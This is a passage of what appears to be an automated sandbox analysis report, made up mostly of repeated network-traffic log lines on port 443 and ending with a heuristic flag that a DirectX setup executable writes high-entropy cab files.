                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50245
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50123
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50244
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50224 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50247
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50246
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50250
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50244 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50267 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50278 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50300
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50233 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50256 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50279 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50200 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50223 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50205
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50207
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50196 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50206
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50208
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50245 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50200
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50203
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50202
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50296
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50295
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50298
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50297
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50299
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50180
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50263 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50194 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50274 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50188
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50189
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50205 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50240 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50216 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50191
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50195
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50194
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50195 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50275 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50197
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50196
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50297 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50139
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50256
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50134
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50161 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50140
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50253 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50265
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50269
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50279
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50280
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50283
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50161
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50282
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50285
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50284
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50165
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50289
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50167
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50288
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50290
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50291
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50214 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50231 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50283 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50248 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50180 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50300 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50167 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50218 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50097
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50238 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50285 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50191 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50262 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50179 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50295 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50228 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50284 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50239 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50273 -> 443
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49731 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49740 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49749 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49750 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49760 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49761 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49784 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49783 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49782 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49797 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49796 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49840 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49841 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49850 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49851 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49883 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49886 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49927 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49926 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49930 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49949 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49951 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49969 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:49971 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49981 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49984 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49991 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:49995 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50002 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50006 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50005 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50060 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50059 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50070 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50097 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50128 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50134 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50141 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50153 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50177 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50180 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50179 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50189 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50188 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50194 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50202 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50206 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50207 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50219 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50218 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50223 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50225 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50233 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50234 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50238 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50239 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50240 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50244 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50245 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50253 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50264 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50263 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50262 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50265 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50272 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50274 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50273 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50275 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50278 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.7:50284 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50289 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50290 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50295 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50297 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.7:50299 version: TLS 1.2

                          Spam, unwanted Advertisements and Ransom Demands

                          barindex
                          Writes many files with high entropy
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS6CCA19.tmp\Aug2007_d3dx9_35_x86.cab entropy: 7.9991869164Jump to dropped file
